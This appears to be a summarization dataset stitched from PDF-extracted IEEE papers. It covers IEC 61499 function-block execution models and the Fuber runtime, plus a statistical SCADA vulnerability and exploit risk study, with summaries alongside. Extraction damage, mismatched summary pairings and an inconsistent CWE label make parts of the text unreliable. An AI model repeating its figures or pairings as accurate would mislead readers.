vol. 2015, no. 7, pp. 9-17, July 2015. [34] Y. L. Wang and S. C. Yang, "A Method of Evaluation for Insider Threat," in Proc. 2014 Int. Symposium on Computer, Consumer and Control, pp. 438-441. 2018 6th International Istanbul Smart Grids and Cities Congress and Fair (ICSG) 85 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:38:37 UTC from IEEE Xplore. Restrictions apply.
Summary:
Industrial Control Systems (ICS) are vital for countries smart grids and critical infrastructures. In addition to the advantages such as controlling and monitoring geographically distributed structures, increasing productivity and efficiency, ICS have brought some security problems. Specific solutions are needed to be produced for these security issues. The most important information security component for ICS is availability and the most devastating threat to this component is Denial of Service (DoS) attack. For this reason, DoS attacks carried out on Programmable Logic Controllers (PLC), an important component of ICS, have been analyzed in the paper. In the test environment where attack scenarios were implemented, real PLC devices were used in order to get the most accurate results. The destructive effects of insiders, particularly in the case of cyber attacks against ICS, in bypassing the system security measure and discovery phase also emphasized in the paper.
|
Summarize:
I. I NTRODUCTION Manufacturing systems and process control systems are typ- ically controlled by a distributed control system. Developingdistributed manufacturing and process control systems is time-consuming and error-prone because the environment is typi-cally heterogeneous consisting of hardware from multiple ven- dors which often imply that different languages and develop- ment tools are used to develop the software control functions.Industrial control system generally has high requirements onreliability and timing constraints of the control functions. Thusthe control software is typically written in special purposelanguages de ned in the standard IEC 61131, [1], [2] and executed on special purpose hardware called ProgrammableLogic Controllers (PLCs). However, IEC 61131, only havevery rudimentary support for developing distributed control applications. For general purpose computers a number of standards for developing distributed systems have emerged, most notableare CORBA [3], DCOM [4], and SOAP [5]. CORBA andSOAP are vendor independent techniques while DCOM relieson services offered by Microsoft Windows. Technically thesestandards may be used for distributed control systems as well,if the hardware would support them. However, due to theirsize and complexity to implement them they are unsuitablefor use by PLC programmers that typically also have limited hardware resources. For industrial control systems two existing standards are in use. Manufacturing Message Speci cation (MMS) [6] has been a standard since 1988 and de nes how the value of one variable in a PLC may be read and written from another PLC.OPC [7] relies on DCOM for transportation of data betweencomputers and is thus relying on Microsoft technologies whichmight be a problem in heterogeneous environments.In 2005 the International Electrotechnical Commission (IEC) approved a standard for distributed function blocks (FBs), IEC 61499 [8] [10] that extends the existing stan- dard IEC 61131 to facilitate the development of distributedcontrol systems. A number of development environments forIEC 61499 have emerged, including FBDK [11], CORFU [12],Torero [13] and ISaGRAF [14]. There are also IEC 61499runtime environments which focus on real-time execution ofFB applications, RTSJ-AXE [15] and RTAI-AXE [16]. Current research on the IEC 61499 standard has focused on architectures for building control application [17] [20]; veri cation of applications [21] [23] and performance analysis of runtime environments [24]. The IEC 61499 standard hasstandardized how a single function block should be executedbut not an execution model for function block networks. Thispaper analyzes the consequences of not having a standardizedexecution model for function block networks. We show howthe same application, when executing in two different standardcompliant runtime environments, may have different logicalbehavior and potentially harm humans or equipment that are interacting with the control system. Thus, moving an application from one runtime environment to another mightrequire a rewrite of the entire application, or a part of it,for correct behavior of the control system. A well de ned execution model is therefore necessary both for being ableto build reusable software components and for being able toverify the behavior of the control application. The choice ofexecution model also has consequences on the performanceof run-time environment. To the authors best knowledge the importance of the function block network execution model on the behavior of the IEC 61499 application has not beenpublished before. In this paper a new runtime environment is also introduced, Fuber [25]. A formal execution model is de ned for Fuber making the behavior deterministic, and thus predictable, andpossible to analyze using existing tools for formal veri cation and synthesis. Translation of an IEC 61499 application running inside Fuber to a set of interacting state automata is presented. The behavior may then be analyzed in standard tool for supervisorveri cation and synthesis, e.g. Supremica [26]. The automata models may also be used for synthesis of scheduling functionso that a given behavior speci cation is satis ed. The paper is organized as follows. In Section II the termi- nology of IEC 61499 standard is introduced. This is followed 1269 1-4244-0681-1/06/$20.00 '2006 IEEE Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:43:02 UTC from IEEE Xplore. Restrictions apply. by an analysis of different execution models in Section III that shows the importance of a well de ned execution environment. In Section IV, a new execution runtime is presented. InSections V and VI the models for two different runtimeenvironments, of which one is Fuber, are presented. The paperis ended with the conclusion. II. IEC 61499 B ASICS In this section the basic terminology from the IEC 61499 standard is introduced. The architecture is based on functionalsoftware units called function blocks where the basic function block type is the basic entity. In Fig. 1(a) the anatomy of a basic function block type is presented. The basic function block executes algorithmsbased on the arriving events and generates new events thatare passed on when the algorithms nish execution. The algorithms use data associated with incoming events to updateinternal variables and produce output data. When an algorithm has terminated an output event is generated triggering another function block for execution. The Execution Control Chart (ECC), of which an example can be seen in Fig. 1(b), determines which algorithm toexecute based on the current input event and values of input,output and internal variables. When a state is entered each action associated with the state is executed once and the ECC stays in the state until a condition for entering another stateis ful lled. The conditions upon which transitions occur are boolean expressions involving input events and input, outputand local variables. A special case of a transition condition isone labeled with 1 , which means that it is always true andis taken as soon as all actions of a state are executed. Basic function blocks are connected together by event and data connections into function block applications. For anexample of a complete application see Fig. 3. The appli-cations can be executed using the runtime environment thatimplements the execution model de ned by the standard. It is however important to note how the standard does not de ne in which order the function blocks should be executed. In thenext section we show with a simple example how this mayhave large consequences for the logical behavior of the control system. III. A NALYSIS OF EXECUTION MODEL In this section the importance of a well de ned execution environment is shown. First, a simple example is introducedand different block scheduling orders are discussed. Second,how to handle events that occur close to each other in time isdiscussed. Finally a conclusion about the execution model ispresented. A. Block Scheduling Order To show the importance of different block execution orders a simple example is used, see Fig. 2. A requirement for thecontrol system is that the OpenClamp algorithm is executed before the PushOut algorithm. A straightforward implemen- tation of the control for this example using IEC 61499 isshown in Fig. 3. When control application is run the only block ready to execute is restart . Execution of restart generates theEvent Input Variables Event Inputs Event/Data Association Data Inputs Data Input VariablesData Output VariablesData OutputsOutputsEventVariablesEvent Output Execution Control Type Identifier Algorithms Internal Variables (a)STATE0 STATE1EI 1 (b)Initial State Transition ConditionAlgorithm Name Output Event EO ALGORITHM State Action State Fig. 1. (a)Anatomy of a basic function block. The left side of the block contains the event and data inputs while the right side contains the event anddata outputs. The basic function block contains an execution control chart (ECC) and a set of algorithms. The ECC determines which algorithm to execute. (b)An example of an execution control chart (ECC). This ECC states that if it is in STATE0 and input event EIis received, the ECC transfers to stateSTATE1 and schedules the algorithm named ALGORITHM for execution. After ALGORITHM has terminated the output event EOis generated, and the ECC returns immediately to state STATE0 since the transition condition is 1 (true). /0/0/0/0/0/0/0/0/0/0/0/0/0/0/0/0/0/0/0 /0/0/0/0/0/0/0/0/0/0 /0/0/0/0/0/0/0/0/0/0 /0/0/0/0/0/0/0/0/0/0 /0 /1/1/1/1/1/1/1/1/1/1/1/1/1/1/1/1/1/1/1 /1/1/1/1/1/1/1/1/1/1 /1/1/1/1/1/1/1/1/1/1 /1/1/1/1/1/1/1/1/1/1 /1 /0/0/0/1/1/1clamp workpiece fixture carriage Fig. 2. The example contains a xture for holding a workpiece and an automatic carriage. The workpiece is processed in the xture. After processing the carriage is brought to the xture as the clamp is opened. When the carriage is in place the workpiece is pushed out and falls into the carriage. The carriage transports the workpiece to a buffer. output event COLD which is an input event to split .A s a consequence output events EO1 andEO2 are generated insplit . At this point both carriage andfixture receive input events. Here the standard does not de ne if carriage should be executed before fixture or the other way around. The standard also allows carriage and fixture to execute concurrently. Assume that carriage executes resulting in another input event to fixture .N o w the only block ready to execute is fixture . According to the standard it is possible for fixture to execute EI1 before EI2 or vice versa. Note, that if EI1 is executed rst then the OpenClamp algorithm is executed before the PushOut algorithm, but if EI2 is executed before EI1 then the PushOut is executed before OpenClamp , possibly resulting in destroyed equipment. Thus, the same standard compliant application executing within two standard compliant runtime environments mayresult in very different behaviors. It is possible to argue thatgiven the speci ed requirements the application should have been implemented in a different way. However, that is besidethe point. Eventually, this subtle problem will arise when theapplication is moved from one runtime environment to another. 1270 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:43:02 UTC from IEEE Xplore. Restrictions apply. restart COLD E_RESTARTsplit EIEO1 EO2 E_SPLIT2carriage EI EO CARRIAGE fixture EI1 EI2 FIXTUREE_SPLIT2 ECC: EO1 EO2EI 1 CARRIAGE ECC: 1EI GetCarriage EOFIXTURE ECC: EI211EI1 OpenClamp PushOut Fig. 3. To the top the function blocks used for control of the application presented in Fig. 2 i shown. To the bottom of the gure the execution control charts of the function blocks are shown. B. Contiguous Events Events that occur close to each other in time are common in reactive and distributed control systems; hence it is desirablethat a standard is explicit on how these contiguous eventsare handled. This section presents what the standard states about contiguous events and how that is implemented in some available runtime environments. Two different cases of contiguous events are discussed: multiple events on different event inputs and multiple events on the same event input. The two cases deal with eventsarriving simultaneously, or almost simultaneously, at the eventinputs of the same function block. For example, one eventarriving to the function block when the block s ECC is busyexecuting an algorithm triggered by the previous event. In the standard [8] the behavior of the ECC is de ned in section 5.2.2.2. It is stated that all operations from invokingof the ECC (which is activated by the arrival of an event atan event input) until there are no more ECC transitions thatcan be taken, should be implemented as a critical region . Our interpretation of this statement is that events arriving while the ECC is busy should not be discarded, instead they should be saved in a queue for later handling. It might be possible toinstead interpret this so that arriving events are discarded whenthe ECC is busy. The latter interpretation could have advan-tages in real-time systems but can lead to undesired behaviorin some applications, for instance the example presented laterin this section. Furthermore, as the standard was interpreted,the event queue does not necessarily have to be a rst-in- rst-out queue. How the queue is implemented may also have important consequences for the behavior of an application, possibly resulting in undesired behavior. To investigate further how contiguous events are handled in different runtime environments an example function block application was used. The application tests the two casesof contiguous events in two available runtime environments.Fuber runtime environment, presented later in this paper, andISaGRAF 5.0 [14], the rst commercially available IEC 61499 runtime and development environment. Fuber is designed fromground up to be an IEC 61499 runtime environment, whileE_RESTARTrestart COLD WARM START STOP E_CYCLEcycle1 DTINCR COUNTERcounter STOPEO START STOP E_CYCLEcycle2 DTEOEI1 EI2 E_MERGEmerge EO t#1 sSTART EO1 EOEI2 EI1b)a) Fig. 4. a) Example application producing simultaneous events. b) ECC for the standard event function block E MERGE. ISaGRAF appears to be an implementation of the IEC 61499 on top of an existing scan-cycle based IEC 61131 runtime. The example application is shown in Fig. 4a. Two ECYCLE blocks produce events which go to the merge block at the same time. Events generated by the merge block then go into a counter block which simply counts the number of arriving events. The ECC for the standard EMERGE function block type is shown in Fig. 4b. Running the application during xseconds, the counter should count 2xevents. When application is executed in Fuber thecounter counts 2xevents while in the scan-cycle based ISaGRAF runtime the counter only counts xevents. This means that every other event has been lost. The problem with the scan cycle-based runtime is that multiple events on different event inputs are not detected bythemerge block and when the ECC is executed for one event the other event is discarded. Hence ISaGRAF has not interpreted, or at least not implemented, the standard the same way as we have, possibly due to the scan-cycle based strategy.This particular problem could however be solved by making anewmerge block with a different ECC which distinguishes between the case when one event arrives on either event inputand the case when an event arrives on both event inputssimultaneously. In the second case the new merge block sends out two output events. Using this solution for the merge block the problem then moves to the counter function block which now does not detect the two events arriving almost simultaneously at the same event input. The solution to the contiguous events problem then requires adjustments to underlying runtime implementation so thatsimultaneously arriving events on an event input are correctly reported to the ECC. Neither of the cases of contiguous events are a problem when function block applications are executedin the Fuber runtime environment since all incoming eventsare reported to the ECC. C. Conclusion about the Execution Model Due to the possible incompatibility between runtime en- vironments presented above, a developer writing IEC 61499 control applications has to be extremely careful if portabilitybetween runtime environments is important. To achieve truewrite once execute on every IEC 61499 runtime environmentkind of portability it is necessary to standardize on a single orpossibly a small number of application execution models (asopposed to function block execution models). Also, in those 1271 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:43:02 UTC from IEEE Xplore. Restrictions apply. cases where portability is not interesting it is important to have a well de ned execution model to be able to analyze the behavior of the application using available tools for formalveri cation. Driven by interest in formal veri cation of IEC 61499 applications a new IEC 61499 runtime environment with awell de ned and thus analyzable execution model has been implemented. In next section this new runtime environment, called Fuber is presented. IV . F UBER Fuber (FUnction Block Execution Runtime) is developed in Java using an open source license and the completesource code is available at [25]. Fuber is able to open manyIEC 61499 compliant applications and execute them. Unlike most other runtime environments Fuber does not compile the algorithms before execution instead the algorithms areinterpreted using BeanShell, [27], which makes it possible toupdate the behavior of an application during execution, a fea-ture that might be useful for debugging and high-availabilityapplications. A. Current Limitations Current limitations of Fuber are that the algorithms must be implemented in Java and that composite data types for variables are not handled. At this point there is also no built in support for distributing applications to multiple resources.There is currently no graphical user interface, instead it iscontrolled by a command line interface. Also there is nosupport for ensuring timeliness of the executed applicationsand no real-time aspects of the runtime environment whereconsidered. Fuber is prepared to be able to update functionblock types and instance as well as connections between func-tion block instances while the application is executing, making it easy to recon gure the control software. It is however not possible to trigger the updates using external Fuber interfaceyet. We are working on removing these limitations. B. Implementation In order to be able to develop a formal execution model some implementation details of Fuber are introduced. Theterminology in this section follows to a large extent theterminology as de ned in the standard [8]. A UML class diagram, [28], of the design of function block scheduler in Fuber is shown in Fig. 5. The schedulerholds
Summary:
The execution model in a new standard for dis- tributed control systems, IEC 61499, is analyzed. It is shown how the same standard compliant application running in two different standard compliant runtime environments may result in completely different behaviors. Thus, to achieve true portabilityof applications between multiple standard compliant runtime environments a more detailed execution model is necessary. In this paper a new runtime environment, Fuber, is presented along with a formal execution model. In this case the execution model is given as a set of interacting state machines which makes it straightforward to analyze the behavior of the application and runtime together using existing tools for formal veri cation.
|
Summarize:
Index Terms Critical infrastructure, cybersecurity, industrial control systems (ICSs), Industrial IoT (IIoT), Internet of Things(IoT) security, risk, supervisory control and data acquisition(SCADA). I. I NTRODUCTION A. Problem Statement CYBERATTACKS can easily disable Industrial Internet of Things (IIoT) devices responsible for urban criti- cal infrastructure. Urban critical infrastructure includes smart grids, water networks, and transportation systems. In 2015,multiple power substations in Ukraine were compromised resulting in rolling power outages affecting 225 000 people [ 1]. Ukraine s supervisory control and data acquisition (SCADA)system that is responsible for controlling the smart grid s IIoT devices is vast and complicated such that it will be impossi- ble to patch all vulnerabilities throughout the networks. While Manuscript received January 23, 2018; revised March 11, 2018; accepted March 27, 2018. Date of publication April 6, 2018; date of current versionJanuary 16, 2019. This work was supported in part by Lockheed Martin and in part by CyberSecurity@CSAIL (Corresponding author: Gregory Falco.) The authors are with the Computer Science and Arti cial Intelligence Laboratory, Massachusetts Institute of Technology, Cambridge, MA 02139-4307 USA (e-mail: gfalco@mit.edu). Digital Object Identi er 10.1109/JIOT.2018.2822842there are vulnerability taxonomies and cybersecurity frame- works that may help to mitigate risk, these tools do not providedata-driven guidance about SCADA security research priorities or a dynamic model to evaluate risk based on various operat- ing parameters. This paper provides a risk analysis of criticalinfrastructure SCADA vulnerabilities and exploits using sta- tistical methods. Further, the study offers technical SCADA IIoT design recommendations to help mitigate future systemexploit risk. Evaluating IIoT exploit risk is challenging. The problem is accentuated by ndings of various security researchersthat the common vulnerability scoring system (CVSS) risk metrics created by First.org and used by the Department of Homeland Security (DHS) and the National Institute of Standards and Technology (NIST) are not effective at predict- ing exploits [ 2], [3]. Further, NIST s cybersecurity framework that intends to help organizations evaluate cyber risk for indus- trial control systems (ICSs) faces adoption challenges and does not directly address exploit probability. Despite beinglabeled as best-in-class, reasons for slow adoption include the considerable time and expense required to implement the framework [ 4]. SCADA and critical infrastructure vul- nerability taxonomies exist that could help to identify cyber risk [ 5] [7]. While these taxonomies could be useful, the nd- ings are not grounded in data-driven, empirical analysis whichraises questions about their applicability to cyber risk in the eld. B. SCADA IIoT Overview SCADA systems provide a supervisory control software layer across multiple programmable logic controllers (PLCs), which are a type of IIoT. SCADA systems are designed foruse over long distances such as water or electric distribution. Because of these longer distances, there tends to be less con- trol over the networks that use them. The 80% of U.S. utilitiesrun on SCADA systems [ 8]. SCADA operates using telephony communication or other third party networks, which reduces the speed, frequency, and quality of communications [ 9]. For this reason, SCADA tends to be event driven meaning that data is only communicated from the devices to the soft- ware when there is a change in value [ 9]. Controlling other IIoT devices, SCADA systems require an operator console or human machine interface (HMI) from which an engineer can view, command, and control the devices connected to the sys-tem [ 10]. This HMI is also vulnerable to attack where an attacker could intercept the PLCs data and alter it on the This work is licensed under a Creative Commons Attribution 3.0 License. For more information, see http://creativecommons.org/licenses/by/3.0/ FALCO et al. : IIoT CYBERSECURITY RISK MODELING FOR SCADA SYSTEMS 4487 HMI [ 11]. SCADA systems typically runs on a commercial off-the-shelf Windows PC which can expose the software toan array of operating system, Windows-based attacks [ 12]. A growing challenge is that there is an increased interest in connecting SCADA-based IIoT systems to IT networks. Thiscan allow for hackers to access potentially vulnerable SCADA systems through backdoors using TCP/IP-based attacks. C. National Policy and Regulatory Landscape In 2013, Executive Order (EO) 13636: Improving Critical Infrastructure Cybersecurity was published. The EO encour- ages the adoption of cybersecurity best practices and mandated that the NIST develop new ways of assessing cybersecu- rity risk [ 13]. The EO falls short, however, because it is entirely voluntary and contains no incentive structures. Also,it puts the burden for taking action only on the shoulders of critical infrastructure operators [ 14]. While NIST created a strong cybersecurity framework which is hailed in industryas best-in-class the nancial burden of implementing NIST s framework is a serious barrier to adoption [ 4]. A less time- intensive, expensive and streamlined alternative to NIST srecommendations is needed for the SCADA community. Industry organizations like the North American Electric Reliability Corporation (NERC), have tried to step in [ 15]. For example, in 2008, NERC proposed critical infrastruc- ture protection reliability standards to the Federal Energy Regulatory Commission (FERC) to improve security for theelectric grid [ 16]. FERC has adopted these recommendations, mandating U.S. electric companies comply with all volun- tary cybersecurity regulation. Extensive survey results from NERC revealed that there are loopholes in the regulation. This enabled 75% of companies to opt-out of cybersecurity regu-lation while those companies that could not opt-out preferred to pay nes rather than update their system security [ 17]. D. Vulnerability Identi cation and Classi cation Vulnerability frameworks are useful tools that draw atten- tion to speci c categories of threats. Several frameworks for vulnerabilities exist today. The MITRE Corporation, devel- oped and maintains a database of common vulnerabilityand exposures (CVEs) to keep track of known software vulnerabilities. Each CVE has an associated risk score cre- ated by First.org called the CVSS. The CVSS base scoreis calculated using a complex formula that is primarily a function of an exploitability score and impact score. NIST s National Vulnerability Database (NVD) cites eachscore (CVSS, impact, and exploitability) alongside each CVE. Findings by Allodi and Massacci [ 2] and Nayak et al. [3] indi- cated that existing security research metrics such as CVSS, exploitability, and impact scores for vulnerability are not an indication of exploit for software. Previous studies focused onsoftware vulnerabilities without considering if there are cer- tain subclasses of software where vulnerability risk metrics actually are effective at indicating exploitability. SCADA as asubclass of software should be investigated to understand the vulnerability metrics relationship with exploits.Along with their database of CVEs, MITRE created a database of common weakness enumeration (CWEs) [ 18]. CWEs classify CVEs by type of vulnerability resulting in a standardized and comprehensive list of cyber weakness classes. While CWEs provide a common language for howto de ne a vulnerability, it does not provide guidance for which CWEs are most relevant for certain classes of soft- ware like SCADA systems which would be relevant to urbancritical infrastructure. From 2009 to 2011, MITRE and the SANS Institute created a prioritized list of CWEs called the CWE/SANS top 25 most dangerous software errors. The listaimed to identify the greatest software vulnerability types; however, it was nonspeci c to a given class of software. The top 25 list used the common weakness scoring system (CWSS) which evaluates vulnerabilities by assessing three metric groups: base nding metric group (captures the inher-ent risk of the weakness, con dence in the accuracy of the nding, and strength of controls), attack surface metric group (assesses the barriers that an attacker must overcome in orderto exploit the weakness), and the environmental metric group (evaluates the characteristics of the weakness that are speci c to a particular environment or operational context) [ 19]. The principal weakness of the CWE/SANS prioritized list is that it fails to consider empirical evidence of exploits. A statistical prioritization would be more effective than a scoring prior-itization such as CWE/SANS top 25 because a data-driven study can account for the prevalence of exploits found in the wild. Typologies and taxonomies of critical infrastructure attack and vulnerability exist [ 6]. Two previous studies on criti- cal infrastructure vulnerabilities focus on different domains: 1) Pak [6] focused on software attacks and 2) Grubesic and Matisziw [5] focused on nonsoftware vulnerabilities. Thesetypologies are very useful to understand the broad critical infrastructure landscape, but fall short as insightful resources for security professionals and researchers because neither arespeci c enough to provide actionable insight to managers, administrators or policy makers. Also, neither speci cally analyze SCADA system security which is essential to city- sustaining systems. Pak [6] listed types of general attacks he believes are most relevant to CI such as distributed denial of serviceattacks, worms, and Trojan horses. Pak [6] also made high- level organizational recommendations including strengthening information sharing practices among vulnerable CI sectors,publicly announcing vulnerabilities to ensure patching, and encouraging public/private collaboration to enhance security posture through training and education programs [ 6]. Further, he encourages continuous monitoring for open ports suscepti- ble to attacks [ 6]. Pak s [6] recommendations lack speci city due to the breadth of cyber systems included in the stan- dard critical infrastructure de nition that includes industries as diverse as the nancial and energy sectors. Therefore, securityprofessionals are unable to leverage this research to further fortify their infrastructure. Grubesic and Matisziw [5] addressed critical infrastructure vulnerability but do not discuss software vulnerabilities. They proposed the following variables are essential to understanding 4488 IEEE INTERNET OF THINGS JOURNAL, VOL. 5, NO. 6, DECEMBER 2018 CI vulnerability: condition and decay, capacity and use, obsolescence, interdependencies, location and network topol-ogy, disruptive threats, policy and political environment, and safeguards [ 5]. While their vulnerability typology is applicable for CI SCADA systems, their omission of software vulnerabil-ities deprives OT security engineers of concrete and actionable recommendations. A cyberattack taxonomy was developed by Zhu et al. [7] for SCADA systems. Zhu et al. s [7] provided recommen- dations for control engineers such as: beware of false data injection, man-in-the-middle, and denial of service attacks. Inaddition to describing types of attacks control engineers should be cognizant of, Zhu et al. [7] provided speci c guidance in terms of hardware and software vulnerabilities for SCADA systems. The vulnerabilities they determined to be most critical for SCADA include: lack of privilege separation in embed-ded operating systems, buffer over ow, and SQL injection [ 7]. While these are concrete vulnerabilities that control engineers can seek out to secure across SCADA systems, it is unclearfrom Zhu et al. [7] analysis how they determined these attacks and vulnerabilities were most important for SCADA. The vul- nerability list is supported by some examples of SCADAsystems that have these vulnerabilities but there is no data- driven evidence that these are the predominant risks for this class of ICS. Based on existing literature, there is a need to understand the similarities and differences between SCADA and non- SCADA vulnerabilities and exploits. Also, the relationshipbetween First.org s vulnerability risk metrics and the preva- lence of exploits for the software subclass of SCADA systems should be investigated. Further, a data-driven vulnerability pri- oritization schema for SCADA that is customizable based on an organization s business parameters is needed to complementNIST s complex ICS cybersecurity framework. II. O URCONTRIBUTION In this paper, we reaf rm other scholarly ndings that the CVSS risk metrics are not correlated with exploits for all soft- ware vulnerabilities; however, unlike our research colleagues we discover that CVSS risk metrics associated with the soft-ware subclass of SCADA systems are strongly correlated with exploit. We demonstrate that certain risk metrics are stronger indicators than others in evaluating the likelihood of exploits for SCADA systems. These metrics are used to generate a cus- tomizable prioritization schema for SCADA vulnerabilities. Aschema can provide a focal point for security researchers to develop SCADA-speci c solutions for the most critical vulner- abilities that extends beyond patching. Patching is not alwaysfeasible in the SCADA/IIoT environment because these sys- tems must be running at all times and there is little guidance from SCADA vendors on the effect a patch might have ona SCADA system [ 20], [21]. The vulnerability prioritization schema can also complement NIST s cybersecurity framework for understanding ICS risk. Finally, by determining the priori-tized exploit risk, we can make targeted SCADA IIoT software development recommendations for mitigating the associated vulnerabilities.A. Experimental Findings To evaluate the landscape of vulnerabilities, a database was collated from the DHS ICS Computer EmergencyResponse Team (ICS-CERT) and the MITRE Corporation s CVE systems. The 828 SCADA-relevant CVEs were found across the databases after accounting for duplicates and entrieswith insuf cient information. These CVEs were then clas- si ed by their categorical vulnerability type called CWE which is published by MITRE. This categorization enabledthe calculation of a SCADA CWE density which provides insight into the distribution of SCADA vulnerabilities across various CWEs. Risk metrics from NIST s NVD were col- lected for each CVE based on First.org s rating methodology. The average risk score across all CVEs in a given CWEwere then calculated, which provided average risk metrics for each vulnerability type. Exploits were then Web-scraped from ExploitDB [ 22], CVEDetails [ 23], and the Metasploit [ 24] code database yielding 52 exploits across 44 SCADA-related CVEs. These exploits were then categorized by their associ- ated CWE, which allowed for the calculation of an exploitdensity per vulnerability type (CWE). A cosine similarity test was run on SCADA versus non- SCADA data to understand if there are differences in thedistribution of vulnerabilities and exploits across the systems. The distribution of CWEs for SCADA and non-SCADA were found to be the same. However, the distribution of types of vul-nerabilities exploited were shown to be different despite having similar vulnerability pro les. This indicates the importance of the exploit density metric for SCADA CWEs. Multivariate regression models were then run to evaluate the relationship between various SCADA risk metrics and exploit density. An R2 value of 0.924, which is indicative of a strong correlation was found. The independent variables regressed against the dependent variable, exploit density included: CVEdensity (number of CVE s per CWE), average impact score per CWE, and average exploitability score per CWE. These variables were then used to develop the SCADA pri- oritization schema. The top CWEs by vulnerability density, exploit density, exploitability score, and impact score were assessed and combined to generate the prioritization schema. In summary, we make the following contributions in this paper. 1) SCADA is a unique software subclass with unique attack targets. We statistically validate that exploits for SCADA systems focus on penetrating a speci c set of vulnerabilities as compared to non-SCADA systems. 2) First.org s CVSS risk metrics can be used to determine the risk of exploit for the software subclass of SCADA systems. Previously, studies concluded in blanket state- ments that First.org s exploitability and impact scores were not indicative of exploit risk. This nding providesgrounds for substantial further work to evaluate the cor- relation of exploit and CVSS scores for other software subclasses. 3) SCADA vulnerabilities can be prioritized by data-driven risk metrics in a customizable schema. This has two ben- e ts. First, security researchers could use this schema FALCO et al. : IIoT CYBERSECURITY RISK MODELING FOR SCADA SYSTEMS 4489 TABLE I ICS-CERT V ERSUS MITRE SCADA V ULNERABILITIES to understand the greatest SCADA vulnerability risk and orient their research to addressing these vulnerabili- ties. Second, a customizable schema provides exibility to organizations and IIoT operators to adjust the vul-nerability prioritization based on business parameters. Additional variables can be incorporated to the schema or weights can be applied to tailor the prioritization to a given organization. 4) SCADA IIoT system developers can use the prioriti- zation schema to easily identify the principal vulnera- bilities based on exploit risk from this paper and take measures to design systems without these vulnerabilitiesin the future. We offer technical design recommenda- tions for SCADA IIoT system software developers to mitigate the primary exploit risks we identify. Inherentlyaccounting for these vulnerabilities during SCADA sys- tem design will dramatically reduce the potential attack surface for IIoT urban critical infrastructure operations. III. M ETHODOLOGY A. Data Collection Data was rst captured on vulnerabilities speci c to SCADA systems. Data was collected from publicly available sources including ICS-CERT, MITRE s CVE and CWE database, and NIST s NVD. The intention was not only to collate the speci cvulnerabilities for SCADA, but also metadata about these vul- nerabilities. The types of information collected included: CVE name and number, associated CWE for each CVE, the CVSSbase score for each CVE, the impact score for each CVE, and the exploitability score of each CVE. SCADA vulnerabilities were determined based on keywords in the description of eachvulnerability across the databases. Keywords used included SCADA and Supervisory Control and Data Acquisition. Other variations of these keywords were also used to capturepotential misspellings. There was an interesting discrepancy between ICS-CERT s SCADA vulnerabilities cited and MITRE s SCADA-relatedCVEs. As represented in Table I, ICS-CERT was missing 592 SCADA CVEs that were present in MITRE s database where MITRE was missing 31 SCADA CVEs that werelisted in ICS-CERT. This discrepancy could represent a lag between updating the two databases considering vulnera- bilities are found more quickly than the database can be updated [ 25]. However, it could also represent the lack of integration between the two databases as they are indepen-dently curated. For purposes of this paper, a master list of SCADA CVEs was created by combining the two databases and removing overlapping SCADA CVEs. Throughout the course of data collection, other data irregu- larities were also discovered. Some of the CVEs for SCADAin the MITRE database failed to have CWEs associated with them. This could be due to the CVE being a nonclassi edvulnerability type. As recently as CWE version 2.8 (as of May 2016 version 2.9 was released), man-in-the-middle vulnerabil- ities were not a classi ed CWE, yet 2.9 has been updated toinclude this CWE. The CWE list is an ongoing project and the absence of some CWEs are likely a function of this. For con- sistency of the dataset, all CVEs that lacked a CWE were notincluded in the analysis. While this could skew the results of the research and guide operators toward a speci c CWE with- out accounting for non-CWE-classi ed vulnerabilities, thereis an underlying assumption made that if a CWE does not exist for a class of CVEs, it is not a popular vulnerability. This assumption was further supported by only 57 out of the 885 SCADA vulnerabilities did not have associated CWEs. Further manual analysis of the CVEs without CWEs con rmedthat the CVEs were not all typologically related thereby dis- missing the possibility that a major type of future CWE is missing. After cleaning the data set and reconciling the discrepancies across the ICS-CERT and MITRE vulnerability databases, the master list contained 828 SCADA-related vulnerabilities. After collecting all SCADA vulnerability data available, a similar process was conducted on non-SCADA vulnerabilities. The intention of collecting non-SCADA data is to evaluatethe differences and similarities between SCADA prioritization schema and non-SCADA prioritization schema. Considering the thousands of documented non-SCADA vulnerabilities, arandom sample was selected from the MITRE CVE database (excluding all SCADA-CVEs). The random sample contained an equal number of vulnerabilities to those in the SCADA master vulnerability list. Similar to the SCADA list, CVEs with missing metadata were removed from the dataset topreserve consistency. Once the master list of vulnerabilities was created, a similar list of exploits for the vulnerabilities was developed. A Web-scraper was developed to capture relevant exploits associated with each vulnerability. The Web-scraper pulled data from ExploitDB, CVEDetails and the Metasploit code database.The intent of the collection was to search for all publicly available exploits that corresponded to the relevant CVEs on the master list (both SCADA and non-SCADA). While someCVEs did not have any publicly available exploits associated with them, others had multiple. In total, for the master CVE list, 44 SCADA CVEs were discovered to have 52 associatedexploits (some CVEs had more than one exploit) and 103 total non-SCADA CVEs were found to have exploits. It is important to note that an inherent limitation of the research is the availability of publicly available information on both vulnerabilities and exploits. Similarly to how MITRE contained vulnerabilities that ICS-CERT did not and vice versa, there are likely other sources of vulnerabilities for SCADA systems that were not captured. The same is true ofexploits, the Web-scraper only pulled from a nite source of exploits. Exploits that appear on forums or on Github were not captured as part of this data collection process. Future workshould include expanding the search for available exploits relevant to SCADA CVEs. 4490 IEEE INTERNET OF THINGS JOURNAL, VOL. 5, NO. 6, DECEMBER 2018 TABLE II TOPSCADA CWE SB Y DENSITY TABLE III TOPSCADA CWE SB Y EXPLOIT DENSITY B. Analysis For purposes of this paper, vulnerability analysis was rolled up to the CWE level. First, the vulnerability density of each CWE was calculated. This was done by dividing the total number of CVEs per CWE by the total number of vulner-abilities. For example, there were 202 CVEs in the CWE buffer over ow. This was divided by the total number of SCADA vulnerabilities, 828, to determine the CWE densityof 24.40%. The density of SCADA CWEs are an indicator of how often these vulnerability types will be found in SCADA critical infrastructure and is important to establishing a prior- itization schema. The top ve CWEs by density are listed in Table II. While one class of CWE may have the highest density across a system type, it does not necessarily mean that there are exploits associated with these CWEs. Because of this,CWE density may not be what matters most to SCADA oper- ators and security personnel. The density of CWE exploits could provide a better assessment of operational risk consid-ering the exploits are readily available for use by attackers. The same formula was applied to the exploits per CWE. For example, there were 32 exploits associated with CVEs in theCWE out-of-bounds read. This was divided by the total num- ber of SCADA exploits, 52, to arrive at the exploit density for buffer over ow to be 61.54%. The top ve CWEs for exploitdensity are listed in Table III. An important observation is that 